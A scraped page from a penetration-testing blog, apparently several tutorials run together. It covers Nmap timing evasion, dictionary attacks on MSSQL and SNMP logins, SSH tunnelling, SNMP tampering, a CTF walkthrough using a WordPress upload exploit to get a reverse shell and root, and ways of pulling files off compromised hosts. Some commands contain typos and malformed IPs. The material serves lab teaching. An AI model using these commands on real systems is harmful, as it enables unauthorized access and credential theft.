Hacking Articles|Raj Chandel's Blog

Hello everyone, in this article we will have a look at the different parameters that are used together to make a timing template and how to use those parameters individually according to will.

Let’s Start!!

Nmap timing template

As we have seen that Nmap has multiple timing templates that can be used for differently as according to the requirement. Click here to check the timing scan article. Let’s see what’s inside the timing template. For getting the description of timing template we’ll use -dattribute.

nmap –T4 –d -p21-25 192.168.1.139

Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.

· Host-groups

· Rtt-timeouts

· Scan-delay

· Max-retires

· Min-rates

· Parallelism

Maximum Retries (--max-retries)

--max-retries specifies the number of times a packet is to be resent on a port to check if it is open or closed. If --max-retries is set to 0, the packets will be sent only once on a port and no retries will be done.

nmap -p21-25 192.168..1.139 --max-retries 0

Here in wireshark, we can see that 1-1 TCP SYN packet sent to each port from source: 192.168.1.126 to destination: 192.168.1.139 are not sent again.

Now we will apply a small firewall rule on the target machine so that the packets get blocked if they come at a faster rate.

sudo iptables -I INPUT -p tcp -m state --state NEW --m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW --m recent --update --seconds 1 --hitcount 1 -j DROP

Now, the normal scan will not show any results with max-retries

nmap -p21-25 192.168..1.139 --max-retries 0

As we can see that the ports whose packets got dropped are not sent again so their status is not determined.

here we can increase the max-retries value which will bypass the specified firewall filter so that we can get the exact port status.

nmap -p21-25 192.168..1.139 --max-retries 5

Here we can see that TCP SYN packets sent to one port from source: 192.168.1.126 to destination: 192.168.1.139 are sent again and again until the packets return a specified reply or the maximum retry value (here 5) is reached.

Host-timeout

The --host-timeout is an attribute that specifies the scan to give up on a host after the specified time. The lesser the time specified the more are the chances of inaccuracy in scan results.

We can specify time in milliseconds (ms), seconds (s), minutes (m)

nmap -p21-25 192.168.1.139 --host-timeout 10ms

Now we will try to get the result by increasing the timeout value

nmap-p21-25 192.168.1.139--host-timeout 100ms

We can use --host-timeout in other scenarios also like when we need to check if the host system is live or not. Here we have shown how the host-timeout can affect the results of a ping scan.

nmap -sp 192.168.1.139 --host-timeout 10ms

Output from above command had given 0 host is up.

nmap -sp 192.168.1.139--host-timeout 100ms

Output from above command had given 1 host is up.

Hostgroup

hostgroup attribute is specified to scan a specified number of hosts in network at a time. You need to specify minimum number of hosts or maximum number of hosts or both to be scaned at a time

nmap --sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3

From given below image you can observed that it has shown only 3 live host from inside complete subnet mask and save your time from scanning complete network.

Scan delay

Scan delay is used to delay the packet to be sent by the specified time. It is very useful in evading time based firewalls.

nmap –p21-25 192.168.1.139 –scan-delay 11s

here we can see the time difference in between the packets

packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get 11 sec time laps between these two packets.

Maximum rate (max-rate)

Rate is an attribute that specifies at what rate is the packets are to be sent, in other words number of packets to be sent at a time. Max-rate specifies maximum number of packets to be sent at once.

nmap -p21-25 192.168.1.139 --max-rate 2

wireshark shows that the packets sending rate is less than 2, means number of packets sent at a time is less than or equal to 2

packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get 1 sec time laps between these two packets indicating that these two packets were not sent together.

Minimum rate (mini-rate)

Min-rate specifies maximum number of packets to be sent at once. Here if we want atleat 2 packet must be sent on target’s network at same time not less then this, then need to execute below command.

nmap -p21-25 192.168.1.139 --min-rate 2

wireshark shows that the packets sending rate is greater than 2, means number of packets sent at a time is equal to or greater than 2

packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get only a fraction of second as time laps between these two packets indicating that these two packets were sent together.

Parallelism

Parallelism attribute is used to send multiple packets in parallel, min-parallelism means that the number of packets to be sent in parallel is to be greater than the value specified and max-parallelism means that the number of packets to be sent in parallel is to be less than or equal to the value specified

nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2

In wireshark we can see the couple of TCP-SYN packetssent in parallel from 192.168.1.126 which is neither less nor greater than 2.

Round trip timeout

Rtt timeout is the time specified for a packet to return a reply, min-rtt-timeout specifies the minimum value of time that is to be taken by a packet to return a reply

nmap -p21-25 192.168.1.139--min-rtt-timeout 5ms

wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified

packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified

packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126

Max-rtt-timeout

max-rtt-timeout specifies the maximum value of time that is to be taken by a packet to return a reply

nmap -p21-25 192.168.1.139--max-rtt-timeout 50ms

wireshark shows that the packet and its reply takes time lesser than the max-rtt-timeout

packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126

Intial Round trip timeout

Initial-rtt-timeout specifies the initial value of time to be taken by a packet to return a reply, the return time can be greater or lesser than the initial-rtt-timeout because of the max-rtt-timeout and min-rtt-timeout specifeies the range of time for a packet to return a reply but the packet attempts to return a reply in the time specified in initial-rtt-timeout

nmap -p21-25 192.168.1.139--initial-rtt-timeout 15ms

wireshark shows that the time taken by packet to return reply is around same as specified in initial-rtt-timeout

packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126

In this article, we will learn how to gain control over our victim’s PC through 1433 Port use for MSSQL service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Let’s starts!!

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

Hydra -L/root/Desktop/user.txt 1433 –P /root/Desktop/pass.txt 16 192.168.1.128 mssql

-P: denotes path for password list

-L: denotes path of username text file (sa is default user of Mssql)

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the MSSQL password as apple@123456

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH, Subversion, and MSSQL to name a few

Run the following command

Medusa -h 192.168.1.128 –u /root/Desktop/user.txt –P /root/Desktop/pass.txt –M Mssql

Here

-u: denotes username (sa is default user of Mssql)

-P: denotes path for password list

As you can observe that we had successfully grabbed the MSSQL password as apple@123456.

xHydra

This is the graphical version to apply dictionary attack via 1433 port to hack a system. For this method to work:

Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select MSSQL in box against Protocol option and give the port number 1433 against the port option.

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username:sa and password of your victim.

Metasploit

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128

msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/user.txt

msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true

msf auxiliary(scanner/mssql/mssql_login) > run

Awesome!! From given below image you can observe the same password: apple@123456 have been found by metasploit.

NMAP

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128

In specfied image you can observe that we had successfully retrieve credential for usersUsername: sa and password: apple@123456

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data.

SSH Tunnel: Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

1. Dynamic SSH tunneling

2. Local SSH tunneling

3. Remote SSH tunneling

Let’s Begin!!

Objective: To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface)

IP 192.168.1.104 connected with remote system

IP 192.168.10.1 connected to local network system 192.168.10.2

SSH client (local network) holds IP 192.168.10.2

Remote system (outside network)

In following image we are trying to explain SSH tunneling process where a remote PC is trying to connect to 192.168.10.2 which is on INTRANET of another network. To establish connection with SSH client (raj), remote PC will create SSH tunnel which will connect with the local system via SSH server (Ignite).

NOTE: Service SSH must be activated on server as well as client machine.

Given below image is describing the network configuration for SSH server where it is showing two IP 192.168.1.104 and another 192.168.10.1

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Dynamic SSH Tunneling through Windows

Remote Pc is trying to connect to SSH server (192.168.1.104) via port 22 and get successful login inside server. Here we had used putty for establishing connection between SSH server (Ubuntu) and remote user (Windows).

Similarly now Remote PC trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for Dynamic SSH tunneling

Choose option SSH >Tunnel given in the left column of category.
Give new port forwarded as 7000 and connection type as dynamic and click on ADD at last.

Now connect to SSH server 192.168.1.104 via port 22 and then click on open when all things get set.

First it will connect to SSH server as you can see we are connected with SSH server (Ignite).

Now login into putty again and give IP of client system as Host Name 192.168.10.2 and Port 22 for SSH then click on open.

Open previous running window of putty choose Proxy option from category and follow given below step:

Select proxy type as SOCKS 5
Give proxy hostname as 127.0.0.1 and port 7000
Click on open to establish connection.

Awesome!! We have successfully access SSH client (raj) via port 7000

Dynamic SSH Tunneling through Kali Linux

Now we are employing Kali Linux for SSH tunneling and demonstrating how an attacker or Linux user can take privilege of Tunneling and can established SSH connection with client systems.

ssh -D 7000 ignite@192.168.1.104

Enter user’s password for login and get access of SSH server as shown below.

Next we need to set network proxy for enabling socksv5 and for that follow below steps.

· In your web browser “Firefox” go to option for general setting tab and open Network Proxy.

· Choose Manual Proxy option.

· Enable socksv5option.

· Add localhost, 127.0.0.1 as No proxy

So from given below image you can perceive that now we able to connect with client: 192.168.10.2 via port 80.

Now connect to client machine through given below command:

ssh -D 7000 ignite@192.168.1.104

Install tsocks through apt repository using command: apt install tsocks.

tsocks - Library for intercepting outgoing network connections and redirecting them through a SOCKS server.

Open the tsocks.conffile for editing socks server IP and port, in our case we need to mention below two lines and then save it.

Server = 127.0.0.1

Server_port = 7000

Now connect to SSH client with the help tsocks using given below command.

tscoks ssh raj@192.168.1.10.2

Enter the password and enjoy the access of SSH client.

Local SSH Tunneling through Windows

Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.

The only difference between dynamic tunneling and local tunneling is that, dynamic tunneling requires socks proxy for tunneling all TCP traffic and local tunneling only required destination IP address.

Step for SSH Local tunneling

· Use putty to connect SSH server (192.168.1.104) via port 22 and choose option SSH >Tunnel given in the left column of category.

· Give new port forwarded as 7000 and connection type as local

· Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.

· Click on open when all things get set.

First this will establish connection between remote pc and SSH server.

Open new window of putty and follow given below step:

· Give hostname as localhost and port 7000 and connection type SSH.

· Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000

Local SSH Tunneling through Kali Linux

Now again we switch into Kali Linux for local tunneling which is quite easy as compare to dynamic. Execute given below command for forwarding port to local machine.

ssh -L 7000:192.168.1.10.2:22 ignite@192.168.1.104

Now open a new terminal and type below command for connecting to SSH client.

ssh raj@127.0.0.1 -p 7000

Awesome!! We have successfully access SSH client via port 7000

Remote SSH Tunneling through Putty

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

First need to install putty in our SSH server (ignite) and then follow given steps.

Step for remote tunneling

· Enter remote system IP 192.168.1.108

· Mention port 22

· Go to SSH>tunnel options

Give new port forwarded as 7000 and connection type as Remote

· Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.

· Click on open when all things get set.

Now server will get connected to Remote system as shown in below image.

Come back to remote system and enter following command to with SSH client machine.

ssh raj@127.0.0.1 -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

Remote SSH Tunneling through Command-Line

If you are not willing to use putty for remote tunneling then you can execute following command

ssh -R 7000:192.168.1.10.2 root@192.168.1.108

Here 192.168.1.10.2 is our local client (raj) IP and 192.168.1.108 is our remote system IP.

Come back to remote system and enter following command to with SSH client machine.

ssh raj@127.0.0.1 -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

In this article, we will learn how to gain control over our victim’s SNMP service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

-P: denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the SNMP password as ignite123.

xHydra

This is the graphical version to apply dictionary attack via SNMP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select SNMP in box against Protocol option and give the port number 161 against the port option.

Now, go to Passwords tab and in Username section check the box adjacent to Protocol doesn’t require username.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

Now go to the specific Tab and in the SNMP and clear the data written in the text box below the SNMP as shown in the given screenshot.

When you will clear all entries it will look like as shown in next image given below.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the password of your victim.

As you can see that we have the password ignite123cracked.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, SNMP, and VNC to name a few

Run the following command

medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt

Here

-h: denotes host IP

-u: denote a particular user

But Brute forcing SNMP doesn’t require username but medusa doesn’t work without a proper syntax, you can use any username of your choice

-P: denotes path for password list

As you can observe that we had successfully grabbed the SNMP password as ignite123.

Metasploit

This module will test SNMP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)

msf auxiliary(scanner/snmp/snmp_login)> set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true

msf auxiliary(scanner/snmp/snmp_login)> run

From given below image you can observe that we had successfully grabbed the SNMP password.

Nmap

We can also crack the snmp password using nmap, execute given below command.

nmap –sU –p 161 –n --script snmp-brute 192.168.1.125 --script-args snmp-brute.communitiesdb=/root/Desktop/pass.txt

As you can see above that we have the password cracked as ignite123.

Onesixtyone

Onesixtyone is an SNMP scanner that sends multiple SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt

As you can see above that we have the password cracked as ignite123 using onesixtyone

What is SNMP?

Simple Network Management Protocol (SNMP) is a protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network. It usually run on UDP port 161.

Download Vyos Link:https://downloads.vyos.io/?dir=release/1.1.8

Create New Virtual Machine using the VMware and change the Network Adapter to Bridged as shown in the given screenshot.

After completing the initial setup in the VMware Boot the Newly created Virtual Machine by clicking on the Power on the Virtual Machine.

The Default Login Credentials for Vyos are

Username: vyos

Password: vyos

The Initial Boot of Vyos will be as shown below:

This is a Live Boot of the vyos, so we will install the vyos to use it properly.

We will use the iso image to install vyos. Type the following command:

Command: install image

Enter “Yes” where it asks to continue.

Next it will ask about the partition management.

Enter “Auto” where it asks about Partition.

It will detect the drives in the Virtual System and ask you to select the particular drive in which you want to install vyos.

Enter “sda” where it asks about the location for installation.

Next it will ask about the size for the root partition for the vyos.

You can enter any size from 1000MB to 21474MB. But it is recommended to keep it maximum i.e. 21474MB.

Next it will ask about the name for the image.

By default the name is set to the version number that is 1.1.8. You can either give a personalised name or you can leave it default.

Next it will ask about the location to copy the sda.

It is recommended to keep it default.

After that it will ask for the password to be kept for the administrator account.

By default it is kept vyos. But from security point of view it is recommended to change it to something complex which is difficult to guess or brute force.

Now it will ask for the drive on which you want to setup GRUB Boot-loader? Again leave it default to “sda”.

After that we have completed the vyos setup. Reboot using the command

Command: reboot

After reboot it will ask for login credentials, Enter the credential that you entered during the installation.

Now we will configure the Network Interface. To do that, we will have to enter configuration mode.

Command: configure

After entering into configuration mode set up Network interface

Syntax: set interface ethernet [network interface] address [Static IPv4 Address]

Command: set interface ethernet eth0 address 192.168.1.125/24

Now Commit and Save the Configuration

Command: commit

Command: save

After that type “exit” to get out of configuration mode and then reboot the machine using “reboot” command

We are rebooting because the configuration changes come in effect only after a reboot.

You can the view interface which we configured by using the command

Command: show interfaces

Note: Above command will run in configuration mode.

Start SNMP service

Now we will set up the snmp service in the Vyos.

For that we will enter configuration mode using command

Command: configure

Now to set up a snmp service we will need to add a community string and give it an authorization. To do that:

Syntax: set service snmp community [community-string] authorization [auth-mode]

[community-string]: It can be anything but normally it is either public or private. But from a security point of view it is recommended to keep it that cannot be easily guessed or bruteforced.

[auth-mode]: It is the Authorization Mode. We have two options

1. [ro]: Read Only Authorization (It can only be used to read or extract data, we can change it using this string)

2. [rw]: Read Write Authorization (It can be used to change the data using the string)

Command: set service snmp community ignite123 authorization ro

Command: set service snmp community ignite123 authorization rw

Now let’s set a user for the system.

Firstly Enter the Configuration Mode.

Command: configure

Now to add a user we will use the following command,

Syntax: set system login user [username] authentication plaintext-password [password]

Command: set system login user ignite authentication plaintext-password ignite123

After this commit the configuration and save it. Also reboot the machine so that changes may take effect.

We have successfully completed snmp Lab in Vyos.

SNMP Enumeration using Kali Linux

Now that we have setup a snmp service let’s pentest it through kali linux inbuilt tools one by one, where We can read and extract information using the community string that have the authorization of reading only but to change the information we will have to use the community string with the read and write authorization.

Nmap

Let’s check using nmap in Kali Linux Machine which is running on the same network.

nmap –sU –p161, 162 192.168.1.125

[-sU]: UDP Ports as SNMP service runs on UDP port

[-p]: Specify Port Number; SNMP service runs on port 161 and 162

From given below image you can observed that it has also shown port 161 is open.

Snmpwalk

snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.

Command: snmpwalk -v1 –c ignite321 192.168.1.125

Here

[-v1]: Level of verbose mode

[-c]: Community String

From given below image you can observe all details that are specified for “STRING”

Snmpset

We can manipulate these details using the iso id, using another tool snmpset. Here we are renaming the host string from vyos to hacked

Command: snmpset –v1 –c ignite321 192.168.1.125 iso.3.6.1.2.1.1.5.0.s Hacked

Let’s check if the changes we implemented had an effect using snmpwalk

Command: snmpwalk –v1 –c ignite321 192.168.1.125

As you can see that the we have successfully change the host name from vyos to hacked.

We can extract a number of information using snmpwalk

Command: snmpwalk –v1 –c ignite321 192.168.1.125 1.3.6.1.2.1.25.4.2.1.2

Command: snmpwalk –v1 -c ignite321 192.168.1.125 1.3.6.1.2.1.6.13.1.3

Command: snmpwalk –v1 –c ignite321 192.168.1.125 1.3.6.1.2.1.25.6.3.1.2

As the data extracted by snmp walk is quite large we can extract that into a text file by using command below

Command: snmpwalk –v1 -c ignite321 192.168.1.125 > snmpout.txt

We can use gedit to view the extracted information

Command: gedit snmpout.txt

SNMP-Check

Like to snmpwalk, snmp-check allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring.

Command: snmp-check 192.168.1.125 -p 161 -c ignite123

Here,

[-p]: To specify port

[-c]: To specify Community String

Braa

Braa is a mass snmp scanner. The intended usage of such a tool is of course making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

Command: braa ignite123@192.168.1.125:.1.3.6.*

Metasploit

We can enumerate SNMP using a Metasploit module called snmp_enum.

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.1.125

msf auxiliary(scanner/snmp/snmp_enum) > set community ignite123

msf auxiliary(scanner/snmp/snmp_enum) > run

We have fetched same result from metasploit as above.

Hello friends! Today we are going to take another CTF challenge known as DerpNStink. The credit for making this vm machine goes to “Bryan Smith” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -A 192.168.1.102 --open

Nmap scan tells us port 21,22 and 80 are open. As port 80 is running http server we open the ip in our browser and run dirb scan.

dirb http://192.168.1.102/

Dirb scan shows that the server has wordpress, and when we open /weblog/ directory. When we open /weblog/ directory we get redirected to derpnstink.local/weblog/

So we add domain name in hosts file to get access to the site.

We first open the domain to check if something new has been added to the website, when we take a look at the source page we find the 1st flag.

Now when we open http://derpnstink.local/weblog we find that it a wordpress site.

We use wpscan to enumerate the plugins and themes and users.

wpscan –u http://192.168.1.102/weblog --enumerate at --enumerate ap –enumerate u

Wpscan shows us that a plugin is exploitable.

We also find username and password to be admin for both.

We use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.1.102

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin

msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

After getting reverse shell we open wp-config.php and find the name of the database and the user required to access the database.

We find the username and password required through mysql.

We also find two directories we cannot access that also hints us the username.

We use the information we find in the wordpress configuration file to login through phpmyadmin.

After logging through phpmyadmin, we find two hashes in wordpress database.

We use john the ripper to crack the hashes and find a password for stinky as wedgie57.

When we login through wordpress using username stinky and password wedgie57, we find 2^nd flag.

We now login to the system through user stinky and password wedgie57. Now going through the system we find our 3^rdflag. We also find a pcap file.

Enumerating through the system we find a file called derpissues.txt that we hints us to use the pcap file we found earlier.

Going through the files we found a ssh key, but we were unable to login through ssh using this key.

Now we copy the pcap file into the ftp directory, to download the file into our system through ftp.

We connect to the target machine through ftp and download the pcap file into our system.

After download the file into our system we open it in wireshark and find the password for the other user

Now we login as mrderp and take a look at the sudoers file and find that we can run a file that starts with derpy as root in /home/mrderp/binaries/derpy*

To run our file as root we create a directory called binaries in /home/mrderp/ directory

Now we create a bash script to spawn to bash shell and save it as derpy.sh

After creating the file we give it read write executable permission and run the file. As soon as we run the file we get the root shell. Going through the files in /root/Desktop directory we find a file called flag.txt, when we open it we find our 4^thflag.

In penetration testing, generally we get stuck when we transfer or download any file from compromised machine or other host machine in a network. Therefore today you will learn which method you should follow for downloading any file from compromised or other host system. All following methods are helpfully in penetration testing and also used for general purpose.

Lets starts!!

File transfer Protocol (FTP)

You all are familiar with the working of FTP server their let’s start today’s tutorial from FTP service.

When you found port 21 is open, it means FTP service is running on remote machine and you are actively looking for downloading a text file from destination machine then you can follow below 2 methods.

1^stmethod use command-line

First connect to ftp server using host IP, enter login credential and then execute getcommand with file name you want to download.

ftp 192.168.1.106

get raj.txt

2^nd method use Browser

Same job can be executed using browser by adding host IP in URL as ftp://192.168.1.106, enter username and password for authentication and download your file.

Install Python FTP server

Generally many people preferred vsftpd server for FTP service for sharing file over port 21 as done above but if you are not compatible with vsftpd then you can go with 2^nd option “Python FTP server” that will allows sharing of file through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access of only a particular folder “aarti” for sharing its data.

sudo python -m pyftpdlib -p 21

So when the host machine will enter destination address in URL “ftp://192.168.1.103” and you will get anonymous login, now download the file.

Hypertext Transfer Protocol (HTTP)

Sharing file through web directory “html”

Another most well-known service for file transfer is HTTP service which uses port 80. Service apache should be activated in your machine for transferring file through web directories and after then you can move any file in to HTML directory for sharing it through http service.

So here we are transferring putty.exe file into html through following command.

cp putty.exe /var/www/html

Now let’s download putty.exe in our machine from destination server. Open your favorite browser and browse file through server address 192.168.1.106/putty.exe in URL. By applying this technique you can access any file from inside web directory i.e. /var/www/html of destination machine.

Sharing through Python Http server

If you are not compatible with above http method then you choose 2^nd option “Simple Http server” which also a python script that use port 80 for sharing file in a network through web browser.

Here again I want to give access of only a particular folder “demo” for sharing its data.

python -m SimpleHTTPServer 80

So when the host machine will enter destination address in URL “http://192.168.1.108” and you will get access for shared folder, now download the file.

HFS Tool

In above Http file sharing method we had use Ubuntu and Linux for transferring a file over port 80 and allowed other host machine to download it through web browser.

Now if you are a windows user then you can use HTS toolfor performing same job. It is most popular tool used file transfer between different platforms.

Steps:

· Download the HFS and run the application

· Now drag and drop the file you want share through web browser.

Now when user of other host machine will open Windows IP as URL http://192.168.1.105 in his web browser he can download the shared file.

Netcat

Netcat is known as Swiss knife which is use for multiple purpose therefore we are going to use it in file transferring.

Use following command for downloading shared file from destination server

Syntax: nc [options] [listening port] > [path to store downloaded file]

nc -lvp 5555 > /root/Desktop/raj.txt

Type following command for sharing any file to host machine in the network.

Syntax: nc host IP host port < file.txt

nc 192.168.1.108 5555 < raj.txt

Now you can observe that we have successfully downloaded raj.txt file at the desktop of our host machine.

Curl

Curl command-line tool for transferring data using various protocols. And is also use for download the data from any website or host machine, following command will download putty.exe file from website.

curl -O http://192.168.1.106/putty.exe

Similarly execute given below command for downloading putty WWW.

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

Wget

Execute given below command for downloading particular file. The downloaded file stores in a current directory. It give indication of download progress, size, date and time though downloading the file.

Enter given below command for downloading any file from html directory of apache server.

wget http://192.168.1.106/putty.exe

Similarly execute given below command for downloading putty WWW.

wget https://the.earth.li/~sgtatham/putty/latest/putty.exe

Trivial File Transfer Protocol (TFTP)

TFTP service was used to read and write any file using a remote connection, it used UDP port 69 for sharing file and do not uses authentication hence it is less secure than FTP.

Here I had created a demo.txtfile inside tftp folder for sharing.

Metasploit contain a module that provides tftp service for file sharing.

use auxiliary/server/tftp

msf auxiliary(server/tftp) > set srvhost 192.168.1.108

msf auxiliary(server/tftp) > set TFTPROOT /root/tftp

msf auxiliary(server/tftp) > exploit

Now open command prompt and execute given below command for downloading demo.txt file in you system.

Syntax: tftp -i host IP GET file name.txt

tftp -i 192.168.1.108 GET demo.txt

As you can observe from given below image it has store downloaded in current directory.

SMB Server using Python script

Now we will use a python script that activates SMB service in our Linux machine. You can visit to githubfor this python script.

I copied the python code from github and past it into a text file as smbserver.py in desktop folder. Now execute give below command for a share folder “raj”.

python smbserver.py raj/root/share

Downloading file from Linux SMB server in Windows Machine

Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it.

In this way we can use smb python script for sharing file between windows and Linux machine.

Downloading file from Linux SMB server in Ubuntu Machine

If you are an Ubuntu user then you can use smbclient service for accessing share folder of smb server.

apt-get install smbclient

Now execute given below command for accessing share folder of server.

smbclient -L 192.168.1.108

From given below image can observe it has shown share folder is “RAJ”

Now execute given below command for accessing share folder raj and download the data present inside it.

smbclient //192.168.1.1.108/raj

Since folder raj has two text file user.txt and pass.txt and we are going to download user.txt through below command.

get user.txt

Download file through Meterpreter

In penetration testing when we compromise target machine and own his meterpreter session using metasploit then inside meterpreter we can execute following command for downloading any file form victim’s machine.

Meterpreter> download raj.txt /root/Desktop

Use Cat command

Cat is very beautiful command and can perform remarkable job if you will use it wisely, suppose you found any text file in host machine and you are unable to download it then open that file through cat command.

For example: I want to know the text inside user.txtthen I will execute following command then copy that text into a new text document and save it in our machine.

Cat user.txt

Download file using Window PowerShell

If you are windows user and have command shell access then you can choose PowerShell for downloading any web server file. Execute given below command in command prompt as administrator.

powershell

(new-object System.Net.WebClient).DownloadFile(‘http://192.168.1.1.106/putty.exe',’d:\data\putty.exe)

From given below image you can observe we had successfully download putty.exe in d: drive.

Download file using BITSAdmin

BITSAdmin is command-line utility for window platform that allows user to downloading and uploading of a file. If you want to download any file from http then you can use following command. It is similar as PowerShell work under admin privileged. Therefore run cmd as administrator and execute given below command for downloading putty.

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe

Now it will start downloading and also gives updates while downloading such as job type i.e downloading, priority and status.

From given below image you can observe that we had downloaded putty.exe in f: drive.

Hello friends! Today we are going to take another CTF challenge known as Vulnupload. The credit for making this vm machine goes to “Mohammad Khreesha” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM.

Let’s Breach!!!

